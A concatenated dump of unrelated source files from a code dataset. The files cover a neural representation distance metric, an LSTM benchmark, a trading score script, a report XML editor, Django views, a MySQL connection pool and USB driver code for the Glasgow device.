_self_dist(X)\n self.Yself_ = _self_dist(Y)\n\n return self\n\n def score(self, X, Y):\n d2 = 2 * self.biased_score(X, Y) - self.Xself_ - self.Yself_\n if (d2 < 0):\n a_badness = np.sqrt(-d2)\n r_badness = -d2 / (self.Xself_ + self.Yself_)\n if (a_badness > self.atol) and (r_badness > self.rtol):\n raise RuntimeError(\n f\"Computed a negative distance. \"\n f\"(absolute error > absolute tol: {a_badness} > {self.atol}).\"\n f\"(relative error > relative tol: {r_badness} > {self.rtol}).\"\n )\n return np.sqrt(max(0, d2))\n\n def biased_score(self, X, Y):\n \"\"\"\n Compute the inflated distance score.\n \"\"\"\n Xm, Ym = _flatten_all_pairs(X, Y)\n resid = Xm - (Ym @ self.Q_) - self.bias_[None, :]\n return np.mean(np.linalg.norm(resid, axis=1))\n\n\ndef _flatten_all_pairs(X, Y):\n \"\"\"\n Flatten activation tensors into matrices, concatenating all pairwise differences\n across repeats of the same input.\n \"\"\"\n n_rep, m, n = X.shape\n Xm, Ym = [], []\n # itr = itertools.product(range(n_rep), range(n_rep))\n itr = itertools.combinations(range(n_rep), 2)\n for (i1, i2), j in itertools.product(itr, range(m)):\n Xm.append(X[i1, j])\n Ym.append(Y[i2, j])\n\n # Convert into numpy arrays.\n return np.array(Xm), np.array(Ym)\n\n\ndef _self_dist(X):\n \"\"\"\n Flatten X and into a matrix, concatenating combinations without\n replacement for the repeats.\n \"\"\"\n n_rep, m, n = X.shape\n itr = itertools.combinations(range(n_rep), 2)\n d = 0.0\n c = 0\n for (i1, i2), j in itertools.product(itr, range(m)):\n d += np.linalg.norm(X[i1, j] - X[i2, j])\n c += 1\n return d / c\n # return d / (m * n_rep * (n_rep - 1) // 2)\n\n\ndef _find_rotation_lbfgs(\n X, Y, tol=1e-6, max_iter=100, verbose=True, center_columns=True,\n ):\n \"\"\"\n Finds orthogonal matrix Q, scaling s, and translation b, to\n\n minimize sum(norm(X - s * Y @ Q - b)).\n\n Note that the solution is not in closed form because we are\n minimizing the sum of norms, which is non-trivial given the\n orthogonality constraint on Q. Without the orthogonality\n constraint, the problem can be formulated as a cone program:\n\n Guoliang Xue & Yinyu Ye (2000). \"An Efficient Algorithm for\n Minimizing a Sum of p-Norms.\" SIAM J. Optim., 10(2), 551–579.\n\n However, the orthogonality constraint complicates things, so\n we just minimize by gradient methods used in manifold optimization.\n\n Mario Lezcano-Casado (2019). \"Trivializations for gradient-based\n optimization on manifolds.\" NeurIPS.\n \"\"\"\n\n # Convert X and Y to pytorch tensors.\n X = torch.tensor(X)\n Y = torch.tensor(Y)\n\n # Check inputs.\n m, n = X.shape\n assert Y.shape == X.shape\n\n # Orthogonal linear transformation.\n Q = nn.Linear(n, n, bias=False)\n geotorch.orthogonal(Q, \"weight\")\n Q = Q.double()\n\n # Allow a rigid translation.\n bias = nn.Parameter(torch.zeros(n, dtype=torch.float64))\n\n # Collect trainable parameters\n trainable_params = list(Q.parameters())\n\n if center_columns:\n trainable_params.append(bias)\n\n # Define rotational alignment, and optimizer.\n optimizer = LBFGS(\n trainable_params,\n max_iter=100, # number of inner iterations.\n line_search_fn=\"strong_wolfe\",\n )\n\n def closure():\n optimizer.zero_grad()\n loss = torch.mean(\n torch.norm(X - Q(Y) - bias, dim=1)\n )\n loss.backward()\n return loss\n\n # Fit parameters.\n converged = False\n itercount = 0\n while (not converged) and (itercount < max_iter):\n\n # Update parameters.\n new_loss = optimizer.step(closure).item()\n\n # Check convergence.\n if itercount != 0:\n improvement = (last_loss - new_loss) / last_loss\n converged = improvement < tol\n \n last_loss = new_loss\n\n # Display progress.\n itercount += 1\n if verbose:\n print(f\"Iter {itercount}: {last_loss}\")\n if converged:\n print(\"Converged!\")\n\n # Extract result in numpy.\n Q_ = Q.weight.detach().numpy()\n bias_ = bias.detach().numpy()\n\n return Q_, bias_\n","sub_path":"netrep/metrics/stochastic.py","file_name":"stochastic.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401218551","text":"import torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport argparse\nimport pprint\nimport gc\n\nif __name__ == '__main__':\n from benchmark_common import benchmark_init\n from common import Bench, tag\n from models import bnlstm\nelse:\n from .benchmark_common import benchmark_init\n from .common import Bench, tag\n from .models import bnlstm\n\n\n# From https://github.com/jihunchoi/recurrent-batch-normalization-pytorch\n\ndef run_bnlstm(hidden_size=100, max_length=784, pmnist=False, num_batches=5,\n cuda=False, jit=False, warmup=10, benchmark=20):\n name = 'bnlstm{}{}'.format(tag(cuda=cuda), tag(jit=jit))\n iter_timer = Bench(name, cuda=cuda, warmup_iters=2)\n\n # The CPU version is slow...\n batch_size = 20 if cuda else 5\n\n class Model(nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.rnn = bnlstm.LSTM(cell_class=bnlstm.BNLSTMCell, input_size=1,\n hidden_size=hidden_size, batch_first=True,\n max_length=max_length, jit=jit)\n self.fc = nn.Linear(in_features=hidden_size, out_features=10) # 10 digits in mnist\n\n def forward(self, data):\n hx = None\n if not pmnist:\n h0 = Variable(data.data.new(data.size(0), hidden_size)\n .normal_(0, 0.1))\n c0 = Variable(data.data.new(data.size(0), hidden_size)\n .normal_(0, 0.1))\n hx = (h0, c0)\n _, (h_n, _) = self.rnn(input_=data, hx=hx)\n logits = self.fc(h_n[0])\n return logits\n\n def cast(tensor):\n return tensor.cuda() if cuda else tensor\n\n model = Model()\n criterion = nn.CrossEntropyLoss()\n data_batches = [Variable(cast(torch.zeros(batch_size, 28 * 28, 1))) for _ in range(num_batches)]\n target_batches = [Variable(cast(torch.zeros(batch_size)).long()) for _ in range(num_batches)]\n if cuda:\n model.cuda()\n criterion.cuda()\n\n total_loss = 0\n for data, targets in zip(data_batches, target_batches):\n gc.collect()\n with iter_timer:\n logits = model(data)\n loss = criterion(input=logits, target=targets)\n loss.backward()\n total_loss += float(loss.data.item()) # CUDA sync point\n\n return iter_timer\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"PyTorch BNLSTM benchmark.\")\n parser.add_argument('--num_batches', type=int, default=1, help=\"num batches\")\n parser.add_argument('--hidden-size', type=int, default=100, help=\"Hidden size\")\n parser.add_argument('--max-length', type=int, default=784, help=\"max seq len\")\n parser.add_argument('--warmup', type=int, default=10, help=\"Warmup iterations\")\n parser.add_argument('--benchmark', type=int, default=20, help=\"Benchmark iterations\")\n parser.add_argument('--jit', action='store_true', help=\"Use JIT\")\n parser.add_argument('--cuda', action='store_true', help=\"Use cuda\")\n args = parser.parse_args()\n\n pprint.pprint(vars(args))\n run_bnlstm(**vars(args))\n","sub_path":"legacy/rnns/benchmarks/bnlstm.py","file_name":"bnlstm.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"651655706","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport json\nimport subprocess\nimport datetime\nimport numpy\nfrom argparse import ArgumentParser\n\nsys.path.append(\"lib\")\nimport utils\nimport slack\nimport strategy\nfrom loader import Loader\n\n\nparser = ArgumentParser()\nparser = strategy.add_options(parser)\nargs = parser.parse_args()\n\ntry:\n performace_dir=\"simulate_settings/performances/\"\n f = open(\"%s%sperformance.json\" % (performace_dir, strategy.get_prefix(args)), \"r\")\n data = json.load(f)\nexcept:\n data = None\n\nif data is None:\n print(\"%s is invalid json\" % args.filename)\n exit()\n\nsetting_dict, _ = strategy.load_strategy_setting(args)\n\noptimize_end_date = setting_dict[\"date\"]\nfiltered = list(filter(lambda x: utils.to_datetime(x[0]) < utils.to_datetime(optimize_end_date), data.items()))\n\nsum_gain = sum(list(map(lambda x: x[1][\"gain\"],filtered))) # 総利益\nsum_trade = sum(list(map(lambda x: x[1][\"trade\"],filtered))) # 総トレード数\nave_trade = numpy.average(list(map(lambda x: x[1][\"trade\"],filtered))) # 平均トレード数\n\ngain = 0\ngains = []\nfor d in sorted(data.items(), key=lambda x:utils.to_datetime(x[0])):\n gain = gain + d[1][\"gain\"]\n gains = gains + [gain]\n\nmin_gain = min(gains)\ngain_per_trade = (sum_gain - (min_gain if min_gain < 0 else -min_gain)) / sum_trade # 1トレード当たりの利益\n\ndiff = []\nfor i, gain in enumerate(gains):\n average = (i+1) * ave_trade * gain_per_trade + min_gain\n diff = diff + [abs(abs(gain) - abs(average))]\n\nscore = 1 / sum(diff) \n\nprint(sum(diff))\nprint(score)\n","sub_path":"performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"96359028","text":"from lxml import etree,objectify\nfrom zipfile import ZipFile\nimport os\nimport argparse\nfrom os.path import basename\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', help='Path for the report',required=True)\n\nargs = parser.parse_args()\nnamespaces = {}\nfolder = [\n \"datasources\",\"META-INF\",\"resources\"\n]\n\ndef get_files_in_path(dir):\n file_paths = []\n for root, directories, files in os.walk(dir): \n for filename in files: \n filepath = os.path.join(root, filename) \n file_paths.append(filepath) \n return file_paths \n\ndef cleanup(path):\n pass\n\ndef compress(path):\n file_paths = get_files_in_path(path)\n with ZipFile(args.path+'first_level.prpt','w') as zip:\n for file in file_paths:\n temp = file.split(os.sep)[-2]\n if temp in folder:\n zip.write(file,temp+\"/\"+basename(file))\n else:\n zip.write(file,basename(file))\n\ndef extract(path,level):\n with ZipFile(path,mode='r') as zipObj:\n zipObj.extractall(path=args.path+level)\n\ndef write(root,path):\n etree.ElementTree(root).write(path+'layout.xml',pretty_print=True)\n\ndef re_namespaces(root):\n for k,v in root.nsmap.items():\n if k == 'style':\n namespaces['style'] = v\n if k == 'core':\n namespaces['core'] = v\n if not k:\n namespaces['prefix'] = v\n\ndef create_style_expression_tag(min_width):\n ns = etree.Element('style-expression')\n ns.attrib['style-key'] = \"min-width\"\n ns.attrib['formula'] = '=IF(ISEXPORTTYPE(\"table/html\");'+str(min_width)+';NA())'\n return ns\n\ndef style_element_style(style):\n min_width = 0\n ss = style.find('style:spatial-styles',namespaces)\n if ss is not None:\n min_width = ss.attrib['min-width'] if 'min-width' in ss.attrib else 0\n return create_style_expression_tag(min_width)\n\ndef remove_width_label(band):\n pass\n\ndef insert_new_node(new,sibling):\n\n if new is not None:\n sibling.addnext(new)\n\ndef remove_width_band(band):\n for b in band:\n new = None\n if \"band\" in b.tag:\n if len(b.findall(\".//style-expression[@style-key='min-width']\",namespaces)) <= 0:\n new = remove_width_band(b)\n insert_new_node(new,b)\n\n elif \"label\" in b.tag:\n if len(b.findall(\".//style-expression[@style-key='min-width']\",namespaces)) <= 0:\n es = b.find('style:element-style',namespaces)\n new = style_element_style(es)\n insert_new_node(new,es)\n\n elif \"style\" in b.tag:\n if len(b.findall(\".//style-expression[@style-key='min-width']\",namespaces)) <= 0:\n new = style_element_style(b)\n insert_new_node(new,b)\n \n return band\n\n\ndef remove_width_from_excel_field(field):\n min_width = 0\n for f in field.find('style:element-style',namespaces).findall('style:spatial-styles',namespaces):\n if f is not None:\n min_width = (f.attrib['min-width'])\n if len(field.findall(\".//style-expression[@style-key='min-width']\",namespaces)) <= 0:\n ns = etree.Element('style-expression')\n ns.attrib['style-key'] = \"min-width\"\n ns.attrib['formula'] = '=IF(ISEXPORTTYPE(\"table/html\");'+str(min_width)+';NA())'\n field.insert(-1,ns)\n return field\n \n\ndef remove_link_from_excel(href):\n link = href.attrib['formula']\n if href.attrib.get('style-key') is not None and href.attrib.get('style-key') == 'href-target':\n if link.find('ISEXPORTTYPE') > -1:\n return link\n else:\n return '=IF(ISEXPORTTYPE(\"table/html\");'+link[1:]+';NA())'\n else:\n return link\n\ndef parse_xml(xmlFile):\n tree = etree.parse(xmlFile+\"layout.xml\")\n root = tree.getroot()\n re_namespaces(root)\n details = root.find(\".//prefix:group\",namespaces)\n hrefs = details.findall(\".//prefix:style-expression[@style-key='href-target']\",namespaces)\n attrb = details.findall(\".//prefix:*[@core:field]\",namespaces)\n header = details.find(\".//prefix:group-header\",namespaces).find('.//prefix:root-level-content',namespaces)\n for href in hrefs:\n href.attrib['formula'] = remove_link_from_excel(href)\n for attr in attrb:\n attr = remove_width_from_excel_field(attr)\n for h in header:\n header = remove_width_band(h)\n write(root,xmlFile)\n \n\ndef main():\n if args.path[-1] != '/':\n args.path = args.path+\"/\"\n level = \"first_level\"\n extract(args.path+level+\".prpt\",level)\n parse_xml(args.path+level+\"/\")\n compress(args.path+level+\"/\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/html_only.py","file_name":"html_only.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"479271042","text":"from django.shortcuts import render,redirect\n\nfrom django.http import HttpResponse\n\n# Create your views here.\n\nfrom conso.models import Releve\nfrom conso.forms import ReleveModelForm\n\ndef home(request):\n if request.method == 'GET':\n form = ReleveModelForm()\n releves = Releve.objects.all().order_by('-date_effectue')[:5]\n return render(request, 'conso/home.html',\n context = {\n 'releves': releves,\n 'form': form,\n }\n )\n elif request.method==\"POST\":\n valeur_compteur = request.POST.get(\"valeur_compteur\",\"\")\n date_effectue = request.POST.get(\"date_effectue\",\"\")\n type_compteur = request.POST.get(\"type_compteur\",\"\")\n releve = Releve(valeur=valeur_compteur , date_effectue=date_effectue , type_compteur=type_compteur)\n releve.save()\n return redirect(\"conso/realisee\")\n\n\n# return render(request,\n# \"conso/home.html\",\n# context = { 'releves': releves}\n# )\n\ndef conso_realisee(request):\n releves = Releve.objects.all()\n return render(request,\n \"conso/conso_realisee.html\",\n context = { 'releves': releves}\n )\n","sub_path":"conso/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"270680874","text":"\"\"\"\n mysql 数据库连接池\n 使用时只需要导入该文件最下边的 mysql 实例即可\n 用例:\n from monday.public.db_util import mysql\n sql = 'select id, username from db_UserInfo where username=%(username)s'\n res = mysql.fetch_all(sql, {'username': 'abc'})\n -- 查询 db_UserInfo 表中 username 为 'abc' 的所有数据 并以 字典形式返回\n\n from monday.public.db_util import mysql\n sql = 'select id, username from db_UserInfo where username=%(username)s'\n res = mysql.fetch_one(sql, {'username': 'abc'}, res_dict=None)\n -- 查询 db_UserInfo 表中 username 为 'abc' 的数据 用元组的形式只返回一条\n\n insert update and delete 是使用事务进行操作的\n\"\"\"\n\nimport pymysql\nfrom dbutils.pooled_db import PooledDB\nfrom ..configs.setting import MYSQL_CONFIG\nfrom flask import current_app\n\nclass MySql:\n def __init__(self):\n self._poolDB = PooledDB(\n # 指定数据库连接驱动\n creator=pymysql,\n # 连接池允许的最大连接数,0和None表示没有限制\n maxconnections=3,\n # 初始化时,连接池至少创建的空闲连接,0表示不创建\n mincached=2,\n # 连接池中空闲的最多连接数,0和None表示没有限制\n maxcached=5,\n # 连接池中最多共享的连接数量,0和None表示全部共享(其实没什么卵用)\n maxshared=3,\n # 连接池中如果没有可用共享连接后,是否阻塞等待,True表示等等,\n # False表示不等待然后报错\n blocking=True,\n # 开始会话前执行的命令列表\n setsession=[],\n # ping Mysql服务器检查服务是否可用, 0 =无=从不,1 =默认=每当从池中获取时,2 =创建游标时,4 =查询时被执行,7 =总是\n ping=0,\n **MYSQL_CONFIG\n )\n\n def _get_one_connect(self, res_dict):\n self._conn = self._poolDB.connection()\n self._cursor = self._conn.cursor(cursor=res_dict)\n\n def _close(self):\n self._cursor.close()\n self._conn.close()\n\n def fetch_one(self, sql, args=None, res_dict=pymysql.cursors.DictCursor):\n \"\"\"\n 返回第一条结果\n :param sql: 查询命令\n :param args: 查询参数\n :param res_dict: 返回结果类型 -默认是字典 -传None 返回元组\n :return:\n \"\"\"\n self._get_one_connect(res_dict)\n self._cursor.execute(sql, args)\n # 随便取一条查询结果\n result = self._cursor.fetchone()\n self._close()\n return result\n\n def fetch_all(self, sql, args=None, res_dict=pymysql.cursors.DictCursor):\n \"\"\"\n 返回所有结果\n :param sql: 查询命令\n :param args: 查询参数\n :param res_dict: 返回结果类型 -默认是字典 -传None 返回元组\n :return:\n \"\"\"\n self._get_one_connect(res_dict)\n self._cursor.execute(sql, args)\n # 随便取一条查询结果\n result = self._cursor.fetchall()\n self._close()\n return result\n\n def _transaction(self, sql, args):\n \"\"\"事务处理\"\"\"\n self._get_one_connect(None)\n self._conn.begin() # 开启事务\n try:\n self._cursor.execute(sql, args)\n self._conn.commit() # 提交事务\n except Exception as e:\n self._conn.rollback() # 事务回滚\n current_app.logger.error(f\"\"\"数据库执行失败:[sql: {sql}] {e}\"\"\")\n raise e\n\n def insert(self, sql, args=None):\n self._transaction(sql, args)\n\n def update(self, sql, args=None):\n self._transaction(sql, args)\n\n def delete(self, sql, args=None):\n self._transaction(sql, args)\n\n\n# 实例,使用的时候引入该实例就行\nmysql = MySql()\n","sub_path":"monday/monday/public/db_util.py","file_name":"db_util.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"273787264","text":"def gcd(m,n):\r\n if(m 0:\n handle.controlWrite(usb1.REQUEST_TYPE_VENDOR, REQ_RAM,\n address, 0, data[:4096])\n data = data[4096:]\n address += 4096\n handle.controlWrite(usb1.REQUEST_TYPE_VENDOR, REQ_RAM, REG_CPUCS, 0, [0])\n handle.close()\n\n # And rediscover the device after it reenumerates.\n discover = True\n else:\n handle = device.open()\n device_serial = handle.getASCIIStringDescriptor(\n device.getSerialNumberDescriptor())\n if device_serial in handles:\n continue\n\n logger.debug(\"found rev%s device with serial %s\", revision, device_serial)\n handles[device_serial] = (revision, handle)\n\n if discover:\n # Give every device we loaded firmware onto a bit of time to reenumerate.\n time.sleep(1.0)\n\n if len(handles) == 0:\n raise GlasgowDeviceError(\"device not found\")\n if serial is None:\n if len(handles) > 1:\n raise GlasgowDeviceError(\"found {} devices (serial numbers {}), but a serial \"\n \"number is not specified\"\n .format(len(handles), \", \".join(handles.keys())))\n else:\n if serial not in handles:\n raise GlasgowDeviceError(\"device with serial number {} not found\"\n .format(serial))\n\n self.usb_context = usb_context\n self.usb_poller = _PollerThread(self.usb_context)\n self.usb_poller.start()\n if serial is None:\n self.revision, self.usb_handle = next(iter(handles.values()))\n else:\n self.revision, self.usb_handle = handles[serial]\n try:\n self.usb_handle.setAutoDetachKernelDriver(True)\n except usb1.USBErrorNotSupported:\n pass\n\n def close(self):\n self.usb_poller.done = True\n self.usb_handle.close()\n self.usb_context.close()\n\n async def _do_transfer(self, is_read, setup):\n # libusb transfer cancellation is asynchronous, and moreover, it is necessary to wait for\n # all transfers to finish cancelling before closing the event loop. To do this, use\n # separate futures for result and cancel.\n cancel_future = asyncio.Future()\n result_future = asyncio.Future()\n\n transfer = self.usb_handle.getTransfer()\n setup(transfer)\n\n def usb_callback(transfer):\n if self.usb_poller.done:\n return # shutting down\n if transfer.isSubmitted():\n return # transfer not completed\n\n status = transfer.getStatus()\n if status == usb1.TRANSFER_CANCELLED:\n usb_transfer_type = transfer.getType()\n if usb_transfer_type == usb1.TRANSFER_TYPE_CONTROL:\n transfer_type = \"CONTROL\"\n if usb_transfer_type == usb1.TRANSFER_TYPE_BULK:\n transfer_type = \"BULK\"\n endpoint = transfer.getEndpoint()\n if endpoint & usb1.ENDPOINT_DIR_MASK == usb1.ENDPOINT_IN:\n endpoint_dir = \"IN\"\n if endpoint & usb1.ENDPOINT_DIR_MASK == usb1.ENDPOINT_OUT:\n endpoint_dir = \"OUT\"\n logger.trace(\"USB: %s EP%d %s (cancelled)\",\n transfer_type, endpoint & 0x7f, endpoint_dir)\n cancel_future.set_result(None)\n elif result_future.cancelled():\n pass\n elif status == usb1.TRANSFER_COMPLETED:\n if is_read:\n result_future.set_result(transfer.getBuffer()[:transfer.getActualLength()])\n else:\n result_future.set_result(None)\n elif status == usb1.TRANSFER_STALL:\n result_future.set_exception(usb1.USBErrorPipe())\n elif status == usb1.TRANSFER_NO_DEVICE:\n result_future.set_exception(GlasgowDeviceError(\"device lost\"))\n else:\n result_future.set_exception(GlasgowDeviceError(\n \"transfer error: {}\".format(usb1.libusb1.libusb_transfer_status(status))))\n\n loop = asyncio.get_event_loop()\n transfer.setCallback(lambda transfer: loop.call_soon_threadsafe(usb_callback, transfer))\n transfer.submit()\n try:\n return await result_future\n except asyncio.CancelledError:\n try:\n transfer.cancel()\n await cancel_future\n except usb1.USBErrorNotFound:\n pass # already finished, one way or another\n raise\n\n async def control_read(self, request_type, request, value, index, length):\n logger.trace(\"USB: CONTROL IN type=%#04x request=%#04x \"\n \"value=%#06x index=%#06x length=%d (submit)\",\n request_type, request, value, index, length)\n data = await self._do_transfer(is_read=True, setup=lambda transfer:\n transfer.setControl(request_type|usb1.ENDPOINT_IN, request, value, index, length))\n logger.trace(\"USB: CONTROL IN data=<%s> (completed)\", dump_hex(data))\n return data\n\n async def control_write(self, request_type, request, value, index, data):\n if not isinstance(data, (bytes, bytearray)):\n data = bytes(data)\n logger.trace(\"USB: CONTROL OUT type=%#04x request=%#04x \"\n \"value=%#06x index=%#06x data=<%s> (submit)\",\n request_type, request, value, index, dump_hex(data))\n await self._do_transfer(is_read=False, setup=lambda transfer:\n transfer.setControl(request_type|usb1.ENDPOINT_OUT, request, value, index, data))\n logger.trace(\"USB: CONTROL OUT (completed)\")\n\n async def bulk_read(self, endpoint, length):\n logger.trace(\"USB: BULK EP%d IN length=%d (submit)\", endpoint & 0x7f, length)\n data = await self._do_transfer(is_read=True, setup=lambda transfer:\n transfer.setBulk(endpoint|usb1.ENDPOINT_IN, length))\n logger.trace(\"USB: BULK EP%d IN data=<%s> (completed)\", endpoint & 0x7f, dump_hex(data))\n return data\n\n async def bulk_write(self, endpoint, data):\n if not isinstance(data, (bytes, bytearray)):\n data = bytes(data)\n logger.trace(\"USB: BULK EP%d OUT data=<%s> (submit)\", endpoint & 0x7f, dump_hex(data))\n await self._do_transfer(is_read=False, setup=lambda transfer:\n transfer.setBulk(endpoint|usb1.ENDPOINT_OUT, data))\n logger.trace(\"USB: BULK EP%d OUT (completed)\", endpoint & 0x7f)\n\n async def _read_eeprom_raw(self, idx, addr, length, chunk_size=0x1000):\n \"\"\"\n Read ``length`` bytes at ``addr`` from EEPROM at index ``idx``\n in ``chunk_size`` byte chunks.\n \"\"\"\n data = bytearray()\n while length > 0:\n chunk_length = min(length, chunk_size)\n logger.debug(\"reading EEPROM chip %d range %04x-%04x\",\n idx, addr, addr + chunk_length - 1)\n data += await self.control_read(usb1.REQUEST_TYPE_VENDOR, REQ_EEPROM,\n addr, idx, chunk_length)\n addr += chunk_length\n length -= chunk_length\n return data\n\n async def _write_eeprom_raw(self, idx, addr, data, chunk_size=0x1000):\n \"\"\"\n Write ``data`` to ``addr`` in EEPROM at index ``idx``\n in ``chunk_size`` byte chunks.\n \"\"\"\n while len(data) > 0:\n chunk_length = min(len(data), chunk_size)\n logger.debug(\"writing EEPROM chip %d range %04x-%04x\",\n idx, addr, addr + chunk_length - 1)\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_EEPROM,\n addr, idx, data[:chunk_length])\n addr += chunk_length\n data = data[chunk_length:]\n\n @staticmethod\n def _adjust_eeprom_addr_for_kind(kind, addr):\n if kind == \"fx2\":\n base_offset = 0\n elif kind == \"ice\":\n base_offset = 1\n else:\n raise ValueError(\"Unknown EEPROM kind {}\".format(kind))\n return 0x10000 * base_offset + addr\n\n async def read_eeprom(self, kind, addr, length):\n \"\"\"\n Read ``length`` bytes at ``addr`` from EEPROM of kind ``kind``\n in ``chunk_size`` byte chunks. Valid ``kind`` is ``\"fx2\"`` or ``\"ice\"``.\n \"\"\"\n logger.debug(\"reading %s EEPROM range %04x-%04x\",\n kind, addr, addr + length - 1)\n addr = self._adjust_eeprom_addr_for_kind(kind, addr)\n result = bytearray()\n while length > 0:\n chunk_addr = addr & ((1 << 16) - 1)\n chunk_length = min(chunk_addr + length, 1 << 16) - chunk_addr\n result += await self._read_eeprom_raw(addr >> 16, chunk_addr, chunk_length)\n addr += chunk_length\n length -= chunk_length\n return result\n\n async def write_eeprom(self, kind, addr, data):\n \"\"\"\n Write ``data`` to ``addr`` in EEPROM of kind ``kind``\n in ``chunk_size`` byte chunks. Valid ``kind`` is ``\"fx2\"`` or ``\"ice\"``.\n \"\"\"\n logger.debug(\"writing %s EEPROM range %04x-%04x\",\n kind, addr, addr + len(data) - 1)\n addr = self._adjust_eeprom_addr_for_kind(kind, addr)\n while len(data) > 0:\n chunk_addr = addr & ((1 << 16) - 1)\n chunk_length = min(chunk_addr + len(data), 1 << 16) - chunk_addr\n await self._write_eeprom_raw(addr >> 16, chunk_addr, data[:chunk_length])\n addr += chunk_length\n data = data[chunk_length:]\n\n async def _status(self):\n result = await self.control_read(usb1.REQUEST_TYPE_VENDOR, REQ_STATUS, 0, 0, 1)\n return result[0]\n\n async def status(self):\n \"\"\"\n Query device status.\n\n Returns a set of flags out of ``{\"fpga-ready\", \"alert\"}``.\n \"\"\"\n status_word = await self._status()\n status_set = set()\n # Status should be queried and ST_ERROR cleared after every operation that may set it,\n # so we ignore it here.\n if status_word & ST_FPGA_RDY:\n status_set.add(\"fpga-ready\")\n if status_word & ST_ALERT:\n status_set.add(\"alert\")\n return status_set\n\n async def bitstream_id(self):\n \"\"\"\n Get bitstream ID for the bitstream currently running on the FPGA,\n or ``None`` if the FPGA does not have a bitstream.\n \"\"\"\n bitstream_id = await self.control_read(usb1.REQUEST_TYPE_VENDOR, REQ_BITSTREAM_ID,\n 0, 0, 16)\n if re.match(rb\"^\\x00+$\", bitstream_id):\n return None\n return bytes(bitstream_id)\n\n async def download_bitstream(self, bitstream, bitstream_id=b\"\\xff\" * 16):\n \"\"\"Download ``bitstream`` with ID ``bitstream_id`` to FPGA.\"\"\"\n # Send consecutive chunks of bitstream.\n # Sending 0th chunk resets the FPGA.\n index = 0\n while index * 1024 < len(bitstream):\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_FPGA_CFG,\n 0, index, bitstream[index * 1024:(index + 1) * 1024])\n index += 1\n # Complete configuration by setting bitstream ID.\n # This starts the FPGA.\n try:\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_BITSTREAM_ID,\n 0, 0, bitstream_id)\n except usb1.USBErrorPipe:\n raise GlasgowDeviceError(\"FPGA configuration failed\")\n\n async def download_target(self, plan, rebuild=False):\n if await self.bitstream_id() == plan.bitstream_id and not rebuild:\n logger.info(\"device already has bitstream ID %s\", plan.bitstream_id.hex())\n else:\n logger.info(\"building bitstream ID %s\", plan.bitstream_id.hex())\n await self.download_bitstream(plan.execute(), plan.bitstream_id)\n\n async def _iobuf_enable(self, on):\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_IOBUF_ENABLE, on, 0, [])\n\n @staticmethod\n def _iobuf_spec_to_mask(spec, one):\n if one and len(spec) != 1:\n raise GlasgowDeviceError(\"exactly one I/O port may be specified for this operation\")\n\n mask = 0\n for port in str(spec):\n if port == \"A\":\n mask |= IO_BUF_A\n elif port == \"B\":\n mask |= IO_BUF_B\n else:\n raise GlasgowDeviceError(\"unknown I/O port {}\".format(port))\n return mask\n\n @staticmethod\n def _mask_to_iobuf_spec(mask):\n spec = \"\"\n if mask & IO_BUF_A:\n spec += \"A\"\n if mask & IO_BUF_B:\n spec += \"B\"\n return spec\n\n async def _write_voltage(self, req, spec, volts):\n millivolts = round(volts * 1000)\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, req,\n 0, self._iobuf_spec_to_mask(spec, one=False), struct.pack(\" 5.0 * (1 + tolerance):\n raise GlasgowDeviceError(\"I/O port {} voltage ({} V) too high\"\n .format(spec, voltage))\n await self.set_voltage(spec, voltage)\n await self.set_alert_tolerance(spec, voltage, tolerance=0.05)\n\n async def get_alert(self, spec):\n try:\n low_millivolts, high_millivolts = struct.unpack(\"= \"C\"\n\n async def set_pulls(self, spec, low=set(), high=set()):\n assert self.has_pulls\n assert not {bit for bit in low | high if bit >= len(spec) * 8}\n\n for index, port in enumerate(spec):\n port_enable = 0\n port_value = 0\n for port_bit in range(0, 8):\n if index * 8 + port_bit in low | high:\n port_enable |= 1 << port_bit\n if index * 8 + port_bit in high:\n port_value |= 1 << port_bit\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_PULL,\n 0, self._iobuf_spec_to_mask(port, one=True),\n struct.pack(\"BB\", port_enable, port_value))\n # Check if we've succeeded\n if await self._status() & ST_ERROR:\n raise GlasgowDeviceError(\"cannot set I/O port(s) {} pull resistors to \"\n \"low={} high={}\"\n .format(spec or \"(none)\", low or \"{}\", high or \"{}\"))\n\n async def _register_error(self, addr):\n if await self._status() & ST_FPGA_RDY:\n raise GlasgowDeviceError(\"register 0x{:02x} does not exist\".format(addr))\n else:\n raise GlasgowDeviceError(\"FPGA is not configured\")\n\n async def read_register(self, addr, width=1):\n \"\"\"Read ``width``-byte FPGA register at ``addr``.\"\"\"\n try:\n value = await self.control_read(usb1.REQUEST_TYPE_VENDOR, REQ_REGISTER, addr, 0, width)\n value = int.from_bytes(value, byteorder=\"little\")\n logger.trace(\"register %d read: %#04x\", addr, value)\n return value\n except usb1.USBErrorPipe:\n await self._register_error(addr)\n\n async def write_register(self, addr, value, width=1):\n \"\"\"Write ``value`` to ``width``-byte FPGA register at ``addr``.\"\"\"\n try:\n logger.trace(\"register %d write: %#04x\", addr, value)\n value = value.to_bytes(width, byteorder=\"big\")\n await 